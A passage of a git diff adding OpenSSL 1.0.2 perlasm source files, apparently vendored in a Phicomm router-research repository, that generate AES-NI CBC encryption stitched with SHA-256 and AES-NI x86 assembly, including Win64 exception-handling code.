+	&vmovdqa	((32*$j)%$PUSH8."(%rsp)",$t2);
+}
+    $aesni_cbc_idx=0;
+    for ($i=0,$j=0; $j<4; $j++) {
+	&AVX2_256_00_47($j,\&bodyx_00_15,@X);
+	push(@X,shift(@X));			# rotate(@X)
+    }
+	&vmovq		("%r13",$offload);	# borrow $a0
+	&vpextrq	("%r15",$offload,1);	# borrow $a2
+	&vpand		($temp,$temp,$mask14);
+	&vpor		($iv,$iv,$temp);
+	&vmovdqu	("(%r15,%r13)",$iv);	# write output
+	&lea		("%r13","16(%r13)");	# inp++
+
+	&lea	($Tbl,16*2*$SZ."($Tbl)");
+	&cmpb	(($SZ-1)."($Tbl)",0);
+	&jne	(".Lavx2_00_47");
+
+	&vmovdqu	($inout,"(%r13)");
+	&vpinsrq	($offload,$offload,"%r13",0);
+
+    $aesni_cbc_idx=0;
+    for ($i=0; $i<16; ) {
+	my $base=$i<8?"+$PUSH8(%rsp)":"(%rsp)";
+	foreach(bodyx_00_15()) { eval; }
+    }
+					}
+$code.=<<___;
+	vpextrq	\$1,$offload,%r12		# $_out, borrow $a4
+	vmovq	$offload,%r13			# $_inp, borrow $a0
+	mov	`2*$SZ*$rounds+5*8`(%rsp),%r15	# $_ctx, borrow $a2
+	add	$a1,$A
+	lea	`2*$SZ*($rounds-8)`(%rsp),$Tbl
+
+	vpand	$mask14,$temp,$temp
+	vpor	$temp,$iv,$iv
+	vmovdqu	$iv,(%r12,%r13)			# write output
+	lea	16(%r13),%r13
+
+	add	$SZ*0(%r15),$A
+	add	$SZ*1(%r15),$B
+	add	$SZ*2(%r15),$C
+	add	$SZ*3(%r15),$D
+	add	$SZ*4(%r15),$E
+	add	$SZ*5(%r15),$F
+	add	$SZ*6(%r15),$G
+	add	$SZ*7(%r15),$H
+
+	mov	$A,$SZ*0(%r15)
+	mov	$B,$SZ*1(%r15)
+	mov	$C,$SZ*2(%r15)
+	mov	$D,$SZ*3(%r15)
+	mov	$E,$SZ*4(%r15)
+	mov	$F,$SZ*5(%r15)
+	mov	$G,$SZ*6(%r15)
+	mov	$H,$SZ*7(%r15)
+
+	cmp	`$PUSH8+2*8`($Tbl),%r13		# $_end
+	je	.Ldone_avx2
+
+	xor	$a1,$a1
+	mov	$B,$a3
+	mov	$F,$a4
+	xor	$C,$a3			# magic
+	jmp	.Lower_avx2
+.align	16
+.Lower_avx2:
+	vmovdqu	(%r13),$inout
+	vpinsrq	\$0,%r13,$offload,$offload
+___
+    $aesni_cbc_idx=0;
+    for ($i=0; $i<16; ) {
+	my $base="+16($Tbl)";
+	foreach(bodyx_00_15()) { eval; }
+	&lea	($Tbl,"-$PUSH8($Tbl)")	if ($i==8);
+    }
+$code.=<<___;
+	vmovq	$offload,%r13			# borrow $a0
+	vpextrq	\$1,$offload,%r15		# borrow $a2
+	vpand	$mask14,$temp,$temp
+	vpor	$temp,$iv,$iv
+	lea	-$PUSH8($Tbl),$Tbl
+	vmovdqu	$iv,(%r15,%r13)			# write output
+	lea	16(%r13),%r13			# inp++
+	cmp	%rsp,$Tbl
+	jae	.Lower_avx2
+
+	mov	`2*$SZ*$rounds+5*8`(%rsp),%r15	# $_ctx, borrow $a2
+	lea	16*$SZ(%r13),%r13
+	mov	`2*$SZ*$rounds+6*8`(%rsp),%rsi	# $_in0, borrow $a3
+	add	$a1,$A
+	lea	`2*$SZ*($rounds-8)`(%rsp),%rsp
+
+	add	$SZ*0(%r15),$A
+	add	$SZ*1(%r15),$B
+	add	$SZ*2(%r15),$C
+	add	$SZ*3(%r15),$D
+	add	$SZ*4(%r15),$E
+	add	$SZ*5(%r15),$F
+	add	$SZ*6(%r15),$G
+	lea	(%rsi,%r13),%r12
+	add	$SZ*7(%r15),$H
+
+	cmp	$_end,%r13
+
+	mov	$A,$SZ*0(%r15)
+	cmove	%rsp,%r12		# next block or stale data
+	mov	$B,$SZ*1(%r15)
+	mov	$C,$SZ*2(%r15)
+	mov	$D,$SZ*3(%r15)
+	mov	$E,$SZ*4(%r15)
+	mov	$F,$SZ*5(%r15)
+	mov	$G,$SZ*6(%r15)
+	mov	$H,$SZ*7(%r15)
+
+	jbe	.Loop_avx2
+	lea	(%rsp),$Tbl
+
+.Ldone_avx2:
+	lea	($Tbl),%rsp
+	mov	$_ivp,$ivp
+	mov	$_rsp,%rsi
+	vmovdqu	$iv,($ivp)		# output IV
+	vzeroall
+___
+$code.=<<___ if ($win64);
+	movaps	`$framesz+16*0`(%rsp),%xmm6
+	movaps	`$framesz+16*1`(%rsp),%xmm7
+	movaps	`$framesz+16*2`(%rsp),%xmm8
+	movaps	`$framesz+16*3`(%rsp),%xmm9
+	movaps	`$framesz+16*4`(%rsp),%xmm10
+	movaps	`$framesz+16*5`(%rsp),%xmm11
+	movaps	`$framesz+16*6`(%rsp),%xmm12
+	movaps	`$framesz+16*7`(%rsp),%xmm13
+	movaps	`$framesz+16*8`(%rsp),%xmm14
+	movaps	`$framesz+16*9`(%rsp),%xmm15
+___
+$code.=<<___;
+	mov	(%rsi),%r15
+	mov	8(%rsi),%r14
+	mov	16(%rsi),%r13
+	mov	24(%rsi),%r12
+	mov	32(%rsi),%rbp
+	mov	40(%rsi),%rbx
+	lea	48(%rsi),%rsp
+.Lepilogue_avx2:
+	ret
+.size	${func}_avx2,.-${func}_avx2
+___
+}}
+}}
+{{
+my ($in0,$out,$len,$key,$ivp,$ctx,$inp)=("%rdi","%rsi","%rdx","%rcx","%r8","%r9","%r10");
+
+my ($rounds,$Tbl)=("%r11d","%rbx");
+
+my ($iv,$in,$rndkey0)=map("%xmm$_",(6,14,15));
+my @rndkey=("%xmm4","%xmm5");
+my $r=0;
+my $sn=0;
+
+my ($Wi,$ABEF,$CDGH,$TMP,$BSWAP,$ABEF_SAVE,$CDGH_SAVE)=map("%xmm$_",(0..3,7..9));
+my @MSG=map("%xmm$_",(10..13));
+
+my $aesenc=sub {
+  use integer;
+  my ($n,$k)=($r/10,$r%10);
+    if ($k==0) {
+      $code.=<<___;
+	movups		`16*$n`($in0),$in		# load input
+	xorps		$rndkey0,$in
+___
+      $code.=<<___ if ($n);
+	movups		$iv,`16*($n-1)`($out,$in0)	# write output
+___
+      $code.=<<___;
+	xorps		$in,$iv
+	movups		`32+16*$k-112`($key),$rndkey[1]
+	aesenc		$rndkey[0],$iv
+___
+    } elsif ($k==9) {
+      $sn++;
+      $code.=<<___;
+	cmp		\$11,$rounds
+	jb		.Laesenclast$sn
+	movups		`32+16*($k+0)-112`($key),$rndkey[1]
+	aesenc		$rndkey[0],$iv
+	movups		`32+16*($k+1)-112`($key),$rndkey[0]
+	aesenc		$rndkey[1],$iv
+	je		.Laesenclast$sn
+	movups		`32+16*($k+2)-112`($key),$rndkey[1]
+	aesenc		$rndkey[0],$iv
+	movups		`32+16*($k+3)-112`($key),$rndkey[0]
+	aesenc		$rndkey[1],$iv
+.Laesenclast$sn:
+	aesenclast	$rndkey[0],$iv
+	movups		16-112($key),$rndkey[1]		# forward reference
+	nop
+___
+    } else {
+      $code.=<<___;
+	movups		`32+16*$k-112`($key),$rndkey[1]
+	aesenc		$rndkey[0],$iv
+___
+    }
+    $r++;	unshift(@rndkey,pop(@rndkey));
+};
+
+if ($shaext) {
+my $Tbl="%rax";
+
+$code.=<<___;
+.type	${func}_shaext,\@function,6
+.align	32
+${func}_shaext:
+	mov	`($win64?56:8)`(%rsp),$inp	# load 7th argument
+___
+$code.=<<___ if ($win64);
+	lea	`-8-10*16`(%rsp),%rsp
+	movaps	%xmm6,-8-10*16(%rax)
+	movaps	%xmm7,-8-9*16(%rax)
+	movaps	%xmm8,-8-8*16(%rax)
+	movaps	%xmm9,-8-7*16(%rax)
+	movaps	%xmm10,-8-6*16(%rax)
+	movaps	%xmm11,-8-5*16(%rax)
+	movaps	%xmm12,-8-4*16(%rax)
+	movaps	%xmm13,-8-3*16(%rax)
+	movaps	%xmm14,-8-2*16(%rax)
+	movaps	%xmm15,-8-1*16(%rax)
+.Lprologue_shaext:
+___
+$code.=<<___;
+	lea		K256+0x80(%rip),$Tbl
+	movdqu		($ctx),$ABEF		# DCBA
+	movdqu		16($ctx),$CDGH		# HGFE
+	movdqa		0x200-0x80($Tbl),$TMP	# byte swap mask
+
+	mov		240($key),$rounds
+	sub		$in0,$out
+	movups		($key),$rndkey0		# $key[0]
+	movups		16($key),$rndkey[0]	# forward reference
+	lea		112($key),$key		# size optimization
+
+	pshufd		\$0x1b,$ABEF,$Wi	# ABCD
+	pshufd		\$0xb1,$ABEF,$ABEF	# CDAB
+	pshufd		\$0x1b,$CDGH,$CDGH	# EFGH
+	movdqa		$TMP,$BSWAP		# offload
+	palignr		\$8,$CDGH,$ABEF		# ABEF
+	punpcklqdq	$Wi,$CDGH		# CDGH
+
+	jmp	.Loop_shaext
+
+.align	16
+.Loop_shaext:
+	movdqu		($inp),@MSG[0]
+	movdqu		0x10($inp),@MSG[1]
+	movdqu		0x20($inp),@MSG[2]
+	pshufb		$TMP,@MSG[0]
+	movdqu		0x30($inp),@MSG[3]
+
+	movdqa		0*32-0x80($Tbl),$Wi
+	paddd		@MSG[0],$Wi
+	pshufb		$TMP,@MSG[1]
+	movdqa		$CDGH,$CDGH_SAVE	# offload
+	movdqa		$ABEF,$ABEF_SAVE	# offload
+___
+	&$aesenc();
+$code.=<<___;
+	sha256rnds2	$ABEF,$CDGH		# 0-3
+	pshufd		\$0x0e,$Wi,$Wi
+___
+	&$aesenc();
+$code.=<<___;
+	sha256rnds2	$CDGH,$ABEF
+
+	movdqa		1*32-0x80($Tbl),$Wi
+	paddd		@MSG[1],$Wi
+	pshufb		$TMP,@MSG[2]
+	lea		0x40($inp),$inp
+___
+	&$aesenc();
+$code.=<<___;
+	sha256rnds2	$ABEF,$CDGH		# 4-7
+	pshufd		\$0x0e,$Wi,$Wi
+___
+	&$aesenc();
+$code.=<<___;
+	sha256rnds2	$CDGH,$ABEF
+
+	movdqa		2*32-0x80($Tbl),$Wi
+	paddd		@MSG[2],$Wi
+	pshufb		$TMP,@MSG[3]
+	sha256msg1	@MSG[1],@MSG[0]
+___
+	&$aesenc();
+$code.=<<___;
+	sha256rnds2	$ABEF,$CDGH		# 8-11
+	pshufd		\$0x0e,$Wi,$Wi
+	movdqa		@MSG[3],$TMP
+	palignr		\$4,@MSG[2],$TMP
+	paddd		$TMP,@MSG[0]
+___
+	&$aesenc();
+$code.=<<___;
+	sha256rnds2	$CDGH,$ABEF
+
+	movdqa		3*32-0x80($Tbl),$Wi
+	paddd		@MSG[3],$Wi
+	sha256msg2	@MSG[3],@MSG[0]
+	sha256msg1	@MSG[2],@MSG[1]
+___
+	&$aesenc();
+$code.=<<___;
+	sha256rnds2	$ABEF,$CDGH		# 12-15
+	pshufd		\$0x0e,$Wi,$Wi
+___
+	&$aesenc();
+$code.=<<___;
+	movdqa		@MSG[0],$TMP
+	palignr		\$4,@MSG[3],$TMP
+	paddd		$TMP,@MSG[1]
+	sha256rnds2	$CDGH,$ABEF
+___
+for($i=4;$i<16-3;$i++) {
+	&$aesenc()	if (($r%10)==0);
+$code.=<<___;
+	movdqa		$i*32-0x80($Tbl),$Wi
+	paddd		@MSG[0],$Wi
+	sha256msg2	@MSG[0],@MSG[1]
+	sha256msg1	@MSG[3],@MSG[2]
+___
+	&$aesenc();
+$code.=<<___;
+	sha256rnds2	$ABEF,$CDGH		# 16-19...
+	pshufd		\$0x0e,$Wi,$Wi
+	movdqa		@MSG[1],$TMP
+	palignr		\$4,@MSG[0],$TMP
+	paddd		$TMP,@MSG[2]
+___
+	&$aesenc();
+	&$aesenc()	if ($r==19);
+$code.=<<___;
+	sha256rnds2	$CDGH,$ABEF
+___
+	push(@MSG,shift(@MSG));
+}
+$code.=<<___;
+	movdqa		13*32-0x80($Tbl),$Wi
+	paddd		@MSG[0],$Wi
+	sha256msg2	@MSG[0],@MSG[1]
+	sha256msg1	@MSG[3],@MSG[2]
+___
+	&$aesenc();
+$code.=<<___;
+	sha256rnds2	$ABEF,$CDGH		# 52-55
+	pshufd		\$0x0e,$Wi,$Wi
+	movdqa		@MSG[1],$TMP
+	palignr		\$4,@MSG[0],$TMP
+	paddd		$TMP,@MSG[2]
+___
+	&$aesenc();
+	&$aesenc();
+$code.=<<___;
+	sha256rnds2	$CDGH,$ABEF
+
+	movdqa		14*32-0x80($Tbl),$Wi
+	paddd		@MSG[1],$Wi
+	sha256msg2	@MSG[1],@MSG[2]
+	movdqa		$BSWAP,$TMP
+___
+	&$aesenc();
+$code.=<<___;
+	sha256rnds2	$ABEF,$CDGH		# 56-59
+	pshufd		\$0x0e,$Wi,$Wi
+___
+	&$aesenc();
+$code.=<<___;
+	sha256rnds2	$CDGH,$ABEF
+
+	movdqa		15*32-0x80($Tbl),$Wi
+	paddd		@MSG[2],$Wi
+___
+	&$aesenc();
+	&$aesenc();
+$code.=<<___;
+	sha256rnds2	$ABEF,$CDGH		# 60-63
+	pshufd		\$0x0e,$Wi,$Wi
+___
+	&$aesenc();
+$code.=<<___;
+	sha256rnds2	$CDGH,$ABEF
+	#pxor		$CDGH,$rndkey0		# black magic
+___
+	while ($r<40)	{ &$aesenc(); }		# remaining aesenc's
+$code.=<<___;
+	#xorps		$CDGH,$rndkey0		# black magic
+	paddd		$CDGH_SAVE,$CDGH
+	paddd		$ABEF_SAVE,$ABEF
+
+	dec		$len
+	movups		$iv,48($out,$in0)	# write output
+	lea		64($in0),$in0
+	jnz		.Loop_shaext
+
+	pshufd		\$0xb1,$CDGH,$CDGH	# DCHG
+	pshufd		\$0x1b,$ABEF,$TMP	# FEBA
+	pshufd		\$0xb1,$ABEF,$ABEF	# BAFE
+	punpckhqdq	$CDGH,$ABEF		# DCBA
+	palignr		\$8,$TMP,$CDGH		# HGFE
+
+	movups		$iv,($ivp)		# write IV
+	movdqu		$ABEF,($ctx)
+	movdqu		$CDGH,16($ctx)
+___
+$code.=<<___ if ($win64);
+	movaps	0*16(%rsp),%xmm6
+	movaps	1*16(%rsp),%xmm7
+	movaps	2*16(%rsp),%xmm8
+	movaps	3*16(%rsp),%xmm9
+	movaps	4*16(%rsp),%xmm10
+	movaps	5*16(%rsp),%xmm11
+	movaps	6*16(%rsp),%xmm12
+	movaps	7*16(%rsp),%xmm13
+	movaps	8*16(%rsp),%xmm14
+	movaps	9*16(%rsp),%xmm15
+	lea	8+10*16(%rsp),%rsp
+.Lepilogue_shaext:
+___
+$code.=<<___;
+	ret
+.size	${func}_shaext,.-${func}_shaext
+___
+}
+}}}}}
+
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+if ($win64) {
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___ if ($avx);
+.extern	__imp_RtlVirtualUnwind
+.type	se_handler,\@abi-omnipotent
+.align	16
+se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HanderlData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# prologue label
+	cmp	%r10,%rbx		# context->Rip<prologue label
+	jb	.Lin_prologue
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lin_prologue
+___
+$code.=<<___ if ($shaext);
+	lea	aesni_cbc_sha256_enc_shaext(%rip),%r10
+	cmp	%r10,%rbx
+	jb	.Lnot_in_shaext
+
+	lea	(%rax),%rsi
+	lea	512($context),%rdi	# &context.Xmm6
+	mov	\$20,%ecx
+	.long	0xa548f3fc		# cld; rep movsq
+	lea	168(%rax),%rax		# adjust stack pointer
+	jmp	.Lin_prologue
+.Lnot_in_shaext:
+___
+$code.=<<___ if ($avx>1);
+	lea	.Lavx2_shortcut(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<avx2_shortcut
+	jb	.Lnot_in_avx2
+
+	and	\$-256*$SZ,%rax
+	add	\$`2*$SZ*($rounds-8)`,%rax
+.Lnot_in_avx2:
+___
+$code.=<<___;
+	mov	%rax,%rsi		# put aside Rsp
+	mov	16*$SZ+7*8(%rax),%rax	# pull $_rsp
+	lea	48(%rax),%rax
+
+	mov	-8(%rax),%rbx
+	mov	-16(%rax),%rbp
+	mov	-24(%rax),%r12
+	mov	-32(%rax),%r13
+	mov	-40(%rax),%r14
+	mov	-48(%rax),%r15
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore context->R12
+	mov	%r13,224($context)	# restore context->R13
+	mov	%r14,232($context)	# restore context->R14
+	mov	%r15,240($context)	# restore context->R15
+
+	lea	16*$SZ+8*8(%rsi),%rsi	# Xmm6- save area
+	lea	512($context),%rdi	# &context.Xmm6
+	mov	\$20,%ecx
+	.long	0xa548f3fc		# cld; rep movsq
+
+.Lin_prologue:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$154,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	se_handler,.-se_handler
+
+.section	.pdata
+	.rva	.LSEH_begin_${func}_xop
+	.rva	.LSEH_end_${func}_xop
+	.rva	.LSEH_info_${func}_xop
+
+	.rva	.LSEH_begin_${func}_avx
+	.rva	.LSEH_end_${func}_avx
+	.rva	.LSEH_info_${func}_avx
+___
+$code.=<<___ if ($avx>1);
+	.rva	.LSEH_begin_${func}_avx2
+	.rva	.LSEH_end_${func}_avx2
+	.rva	.LSEH_info_${func}_avx2
+___
+$code.=<<___ if ($shaext);
+	.rva	.LSEH_begin_${func}_shaext
+	.rva	.LSEH_end_${func}_shaext
+	.rva	.LSEH_info_${func}_shaext
+___
+$code.=<<___ if ($avx);
+.section	.xdata
+.align	8
+.LSEH_info_${func}_xop:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lprologue_xop,.Lepilogue_xop		# HandlerData[]
+
+.LSEH_info_${func}_avx:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lprologue_avx,.Lepilogue_avx		# HandlerData[]
+___
+$code.=<<___ if ($avx>1);
+.LSEH_info_${func}_avx2:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lprologue_avx2,.Lepilogue_avx2		# HandlerData[]
+___
+$code.=<<___ if ($shaext);
+.LSEH_info_${func}_shaext:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lprologue_shaext,.Lepilogue_shaext	# HandlerData[]
+___
+}
+
+####################################################################
+sub rex {
+  local *opcode=shift;
+  my ($dst,$src)=@_;
+  my $rex=0;
+
+    $rex|=0x04			if($dst>=8);
+    $rex|=0x01			if($src>=8);
+    unshift @opcode,$rex|0x40	if($rex);
+}
+
+{
+  my %opcodelet = (
+		"sha256rnds2" => 0xcb,
+  		"sha256msg1"  => 0xcc,
+		"sha256msg2"  => 0xcd	);
+
+  sub sha256op38 {
+    my $instr = shift;
+
+    if (defined($opcodelet{$instr}) && @_[0] =~ /%xmm([0-9]+),\s*%xmm([0-9]+)/) {
+      my @opcode=(0x0f,0x38);
+	rex(\@opcode,$2,$1);
+	push @opcode,$opcodelet{$instr};
+	push @opcode,0xc0|($1&7)|(($2&7)<<3);		# ModR/M
+	return ".byte\t".join(',',@opcode);
+    } else {
+	return $instr."\t".@_[0];
+    }
+  }
+}
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+$code =~ s/\b(sha256[^\s]*)\s+(.*)/sha256op38($1,$2)/gem;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesni-x86.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesni-x86.pl
new file mode 100644
index 0000000..3deb86a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesni-x86.pl
@@ -0,0 +1,2232 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# This module implements support for Intel AES-NI extension. In
+# OpenSSL context it's used with Intel engine, but can also be used as
+# drop-in replacement for crypto/aes/asm/aes-586.pl [see below for
+# details].
+#
+# Performance.
+#
+# To start with see corresponding paragraph in aesni-x86_64.pl...
+# Instead of filling table similar to one found there I've chosen to
+# summarize *comparison* results for raw ECB, CTR and CBC benchmarks.
+# The simplified table below represents 32-bit performance relative
+# to 64-bit one in every given point. Ratios vary for different
+# encryption modes, therefore interval values.
+#
+#	16-byte     64-byte     256-byte    1-KB        8-KB
+#	53-67%      67-84%      91-94%      95-98%      97-99.5%
+#
+# Lower ratios for smaller block sizes are perfectly understandable,
+# because function call overhead is higher in 32-bit mode. Largest
+# 8-KB block performance is virtually same: 32-bit code is less than
+# 1% slower for ECB, CBC and CCM, and ~3% slower otherwise.
+
+# January 2011
+#
+# See aesni-x86_64.pl for details. Unlike x86_64 version this module
+# interleaves at most 6 aes[enc|dec] instructions, because there are
+# not enough registers for 8x interleave [which should be optimal for
+# Sandy Bridge]. Actually, performance results for 6x interleave
+# factor presented in aesni-x86_64.pl (except for CTR) are for this
+# module.
+
+# April 2011
+#
+# Add aesni_xts_[en|de]crypt. Westmere spends 1.50 cycles processing
+# one byte out of 8KB with 128-bit key, Sandy Bridge - 1.09.
+
+######################################################################
+# Current large-block performance in cycles per byte processed with
+# 128-bit key (less is better).
+#
+#		CBC en-/decrypt	CTR	XTS	ECB
+# Westmere	3.77/1.37	1.37	1.52	1.27
+# * Bridge	5.07/0.98	0.99	1.09	0.91
+# Haswell	4.44/0.80	0.97	1.03	0.72
+# Atom		5.77/3.56	3.67	4.03	3.46
+# Bulldozer	5.80/0.98	1.05	1.24	0.93
+
+$PREFIX="aesni";	# if $PREFIX is set to "AES", the script
+			# generates drop-in replacement for
+			# crypto/aes/asm/aes-586.pl:-)
+$inline=1;		# inline _aesni_[en|de]crypt
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+
+&asm_init($ARGV[0],$0);
+
+if ($PREFIX eq "aesni")	{ $movekey=\&movups; }
+else			{ $movekey=\&movups; }
+
+$len="eax";
+$rounds="ecx";
+$key="edx";
+$inp="esi";
+$out="edi";
+$rounds_="ebx";	# backup copy for $rounds
+$key_="ebp";	# backup copy for $key
+
+$rndkey0="xmm0";
+$rndkey1="xmm1";
+$inout0="xmm2";
+$inout1="xmm3";
+$inout2="xmm4";
+$inout3="xmm5";	$in1="xmm5";
+$inout4="xmm6";	$in0="xmm6";
+$inout5="xmm7";	$ivec="xmm7";
+
+# AESNI extenstion
+sub aeskeygenassist
+{ my($dst,$src,$imm)=@_;
+    if ("$dst:$src" =~ /xmm([0-7]):xmm([0-7])/)
+    {	&data_byte(0x66,0x0f,0x3a,0xdf,0xc0|($1<<3)|$2,$imm);	}
+}
+sub aescommon
+{ my($opcodelet,$dst,$src)=@_;
+    if ("$dst:$src" =~ /xmm([0-7]):xmm([0-7])/)
+    {	&data_byte(0x66,0x0f,0x38,$opcodelet,0xc0|($1<<3)|$2);}
+}
+sub aesimc	{ aescommon(0xdb,@_); }
+sub aesenc	{ aescommon(0xdc,@_); }
+sub aesenclast	{ aescommon(0xdd,@_); }
+sub aesdec	{ aescommon(0xde,@_); }
+sub aesdeclast	{ aescommon(0xdf,@_); }
+
+# Inline version of internal aesni_[en|de]crypt1
+{ my $sn;
+sub aesni_inline_generate1
+{ my ($p,$inout,$ivec)=@_; $inout=$inout0 if (!defined($inout));
+  $sn++;
+
+    &$movekey		($rndkey0,&QWP(0,$key));
+    &$movekey		($rndkey1,&QWP(16,$key));
+    &xorps		($ivec,$rndkey0)	if (defined($ivec));
+    &lea		($key,&DWP(32,$key));
+    &xorps		($inout,$ivec)		if (defined($ivec));
+    &xorps		($inout,$rndkey0)	if (!defined($ivec));
+    &set_label("${p}1_loop_$sn");
+	eval"&aes${p}	($inout,$rndkey1)";
+	&dec		($rounds);
+	&$movekey	($rndkey1,&QWP(0,$key));
+	&lea		($key,&DWP(16,$key));
+    &jnz		(&label("${p}1_loop_$sn"));
+    eval"&aes${p}last	($inout,$rndkey1)";
+}}
+
+sub aesni_generate1	# fully unrolled loop
+{ my ($p,$inout)=@_; $inout=$inout0 if (!defined($inout));
+
+    &function_begin_B("_aesni_${p}rypt1");
+	&movups		($rndkey0,&QWP(0,$key));
+	&$movekey	($rndkey1,&QWP(0x10,$key));
+	&xorps		($inout,$rndkey0);
+	&$movekey	($rndkey0,&QWP(0x20,$key));
+	&lea		($key,&DWP(0x30,$key));
+	&cmp		($rounds,11);
+	&jb		(&label("${p}128"));
+	&lea		($key,&DWP(0x20,$key));
+	&je		(&label("${p}192"));
+	&lea		($key,&DWP(0x20,$key));
+	eval"&aes${p}	($inout,$rndkey1)";
+	&$movekey	($rndkey1,&QWP(-0x40,$key));
+	eval"&aes${p}	($inout,$rndkey0)";
+	&$movekey	($rndkey0,&QWP(-0x30,$key));
+    &set_label("${p}192");
+	eval"&aes${p}	($inout,$rndkey1)";
+	&$movekey	($rndkey1,&QWP(-0x20,$key));
+	eval"&aes${p}	($inout,$rndkey0)";
+	&$movekey	($rndkey0,&QWP(-0x10,$key));
+    &set_label("${p}128");
+	eval"&aes${p}	($inout,$rndkey1)";
+	&$movekey	($rndkey1,&QWP(0,$key));
+	eval"&aes${p}	($inout,$rndkey0)";
+	&$movekey	($rndkey0,&QWP(0x10,$key));
+	eval"&aes${p}	($inout,$rndkey1)";
+	&$movekey	($rndkey1,&QWP(0x20,$key));
+	eval"&aes${p}	($inout,$rndkey0)";
+	&$movekey	($rndkey0,&QWP(0x30,$key));
+	eval"&aes${p}	($inout,$rndkey1)";
+	&$movekey	($rndkey1,&QWP(0x40,$key));
+	eval"&aes${p}	($inout,$rndkey0)";
+	&$movekey	($rndkey0,&QWP(0x50,$key));
+	eval"&aes${p}	($inout,$rndkey1)";
+	&$movekey	($rndkey1,&QWP(0x60,$key));
+	eval"&aes${p}	($inout,$rndkey0)";
+	&$movekey	($rndkey0,&QWP(0x70,$key));
+	eval"&aes${p}	($inout,$rndkey1)";
+    eval"&aes${p}last	($inout,$rndkey0)";
+    &ret();
+    &function_end_B("_aesni_${p}rypt1");
+}
+
+# void $PREFIX_encrypt (const void *inp,void *out,const AES_KEY *key);
+&aesni_generate1("enc") if (!$inline);
+&function_begin_B("${PREFIX}_encrypt");
+	&mov	("eax",&wparam(0));
+	&mov	($key,&wparam(2));
+	&movups	($inout0,&QWP(0,"eax"));
+	&mov	($rounds,&DWP(240,$key));
+	&mov	("eax",&wparam(1));
+	if ($inline)
+	{   &aesni_inline_generate1("enc");	}
+	else
+	{   &call	("_aesni_encrypt1");	}
+	&movups	(&QWP(0,"eax"),$inout0);
+	&ret	();
+&function_end_B("${PREFIX}_encrypt");
+
+# void $PREFIX_decrypt (const void *inp,void *out,const AES_KEY *key);
+&aesni_generate1("dec") if(!$inline);
+&function_begin_B("${PREFIX}_decrypt");
+	&mov	("eax",&wparam(0));
+	&mov	($key,&wparam(2));
+	&movups	($inout0,&QWP(0,"eax"));
+	&mov	($rounds,&DWP(240,$key));
+	&mov	("eax",&wparam(1));
+	if ($inline)
+	{   &aesni_inline_generate1("dec");	}
+	else
+	{   &call	("_aesni_decrypt1");	}
+	&movups	(&QWP(0,"eax"),$inout0);
+	&ret	();
+&function_end_B("${PREFIX}_decrypt");
+
+# _aesni_[en|de]cryptN are private interfaces, N denotes interleave
+# factor. Why 3x subroutine were originally used in loops? Even though
+# aes[enc|dec] latency was originally 6, it could be scheduled only
+# every *2nd* cycle. Thus 3x interleave was the one providing optimal
+# utilization, i.e. when subroutine's throughput is virtually same as
+# of non-interleaved subroutine [for number of input blocks up to 3].
+# This is why it originally made no sense to implement 2x subroutine.
+# But times change and it became appropriate to spend extra 192 bytes
